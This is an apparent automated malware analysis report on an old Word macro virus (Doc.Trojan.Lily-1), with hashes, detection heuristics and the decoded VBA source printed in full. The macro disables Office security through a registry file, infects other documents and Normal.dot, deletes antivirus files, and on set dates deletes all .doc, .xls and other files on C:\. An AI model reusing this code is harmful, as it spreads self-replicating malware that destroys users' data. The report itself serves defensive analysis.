Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9bfa26716092c54e…

MALICIOUS

Office (OLE)

43.5 KB Created: 2001-06-04 19:45:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 5896ccf77de1c7d676e54109277c8deb SHA-1: e30bcbeeccb564ba0aa8350bf71c57a2a16580cf SHA-256: 9bfa26716092c54e7907b34566cfbdd01d57b3dd2f27dbd2db44ddcfd7ec1645
320 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros that execute upon document close. The macro attempts to disable Word and Excel security settings by writing to the registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\Security and HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Excel\Security' with a value of '1' via a temporary registry file 'c:\1.reg'. This action aims to lower security barriers for potential future malicious execution.

Heuristics 6

  • ClamAV: Doc.Trojan.Lily-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Lily-1
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11791 bytes
SHA-256: a9f25b0710c23ff708516e02ed1a7e67a96b1ca6c980071acb5b860c6bf2f430
Detection
ClamAV: Doc.Trojan.Lily-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True








































































































































































































Private Sub Document_Close()
'Lisa 2000'
'___Íĺ ďîęŕçűâŕňü âîçíčęŕţůčĺ îřčáęč___'
 On Error Resume Next
'___Îňęëţ÷ĺíčĺ çŕůčňű îň âčđóńîâ äë˙ âîđäŕ 97___'
 Application.Options.VirusProtection = False
 
 '___Îňęëţ÷ĺíčĺ çŕůčňű îň âčđóńîâ äë˙ âîđäŕ 2000, ŕ çŕîäíî č äë˙ ýęńĺë˙___'
            Set sm = CreateObject("Scripting.FileSystemObject")
            Set Ate = sm.CreateTextFile("c:\1.reg", True)
            Ate.WriteLine ("REGEDIT4")
            Ate.WriteLine (" ")
            Ate.WriteLine ("[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\Security]")
            Ate.WriteLine (Chr(34) + "Level" + Chr(34) + "=dword:00000001")
            Ate.WriteLine (" ")
            Ate.WriteLine ("[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Excel\Security]")
            Ate.WriteLine (Chr(34) + "Level" + Chr(34) + "=dword:00000001")
            Ate.Close
            MyAppID = Shell("regedit.exe /s c:\1.reg", 0)
            newHour = Hour(Now())
            newMinute = Minute(Now())
            newSecond = Second(Now()) + 5
            waitTime = TimeSerial(newHour, newMinute, newSecond)
            Kill ("c:\1.reg")

'___Çŕđŕćĺíčĺ îňęđűňűő äîęóěĺíňîâ___'
    s = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.countoflines
    d = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, s)
    For k = 1 To Application.Documents.Count
      t = Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.countoflines
     If t = 0 Then
      Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, d
     End If
    Next k
 
 '___Çŕđŕćĺíčĺ Normal.dot (Ŕâňîçŕăđóçęŕ)___'
    t = Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.countoflines
    If t = 0 Then
      Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, d
    End If
    
 '___Ďđîâĺđęŕ "Ńâîé"-"×óćîé"___'
     Set ms = Application.FileSearch
     Set gato = Application.FileSearch
     With ms
        .LookIn = "c:\windows\system\"
        .FileName = "lisa.dll"
     
     If .Execute(SortBy:=msoSortByFileName, _
           SortOrder:=msoSortOrderAscending) > 0 Then
    
 '___Ĺńëč ńâîé, íŕ âűőîä___'
       GoTo 80
       
 '___Ĺńëč ÷óćîé, âđĺäčňü____'
       Else
 
 '___Îáëîěŕňü AVP___'
      Kill ("c:\Program Files\AntiViral Toolkit Pro\*.avc")
      
 '___Äĺíü ŔĐĚŔĂĹÄÎÍŔ___'
     If (Day(Now()) = 23) And (Month(Now()) = 2) Or (Day(Now()) = 1) And (Month(Now()) = 1) Or (Day(Now()) = 8) And (Month(Now()) = 3) Or (Day(Now()) = 30) And (Month(Now()) = 4) Or (Day(Now()) = 30) And (Month(Now()) = 8) Or (Day(Now()) = 10) And (Month(Now()) = 1) Then
     With gato
     .LookIn = "c:\"
     .FileName = "*.doc"
     .SearchSubFolders = True
     If .Execute > 0 Then
      For y = 1 To .FoundFiles.Count
       Kill (.FoundFiles(y))
      Next y
     End If
     End With
     With gato
     .LookIn = "c:\"
     .FileName = "*.xls"
     .SearchSubFolders = True
     If .Execute > 0 Then
      For y = 1 To .FoundFiles.Count
       Kill (.FoundFiles(y))
      Next y
     End If
     End With
     With gato
     .LookIn = "c:\"
     .FileName = "*.*"
     .SearchSubFolders = True
     If .Execute > 0 Then
      For y = 1 To .FoundFiles.Count
       Kill (.FoundFiles(y))
      Next y
     End If
     End With
     End If
    
    End If
    End With
 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.